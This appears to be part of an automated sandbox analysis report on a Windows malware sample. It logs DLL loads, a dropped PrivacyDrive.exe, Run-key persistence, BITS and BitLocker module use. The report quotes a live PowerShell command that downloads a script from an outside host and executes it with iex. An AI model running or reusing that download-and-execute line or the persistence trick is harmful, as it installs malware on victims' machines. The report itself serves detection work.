Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: Google Drive.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr
Source: Binary string: _.nDb=_.J("VOy8xe");_.oDb=_.J("s2IYHc");_.pDb=_.J("ucVTnf");_.qDb=_.J("pU3PWb"); source: chromecache_242.1.dr, chromecache_193.1.dr
Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr
Source: Binary string: _.KDb=function(){var a=_.Jv;if(a.ka!==null)return a.ka;if(document.body){var b=_.Ql.N7(document.body).top;return a.ka=b}return 0};_.Jv=new _.Iv;_.Kv=function(a){_.Jv.WZa(a)};_.LDb=function(){return _.Jv.getScrollTop()};_.Lv=function(a,b){_.Jv.fixedUiScrollTo(a,b)};NDb=navigator.userAgent.match(/ GSA\/([.\d]+)/);MDb=NDb?NDb[1]:"";_.ODb=_.Vb&&_.pa(MDb,"4")>=0;_.PDb=_.Vb&&_.pa(MDb,"5.2")>=0;_.QDb=_.Vb&&_.pa(MDb,"4.3")>=0&&!(_.pa(MDb,"4.5")>=0); source: chromecache_242.1.dr, chromecache_193.1.dr

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_04802307 push ecx; retf 16_2_04802308
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_05A00905 push ecx; retf 16_2_05A00906

Persistence and Installation Behavior
barindex
Powershell uses Background Intelligent Transfer Service (BITS)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: \KnownDlls\BitsProxy.dll Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0Beb Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0Beb Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
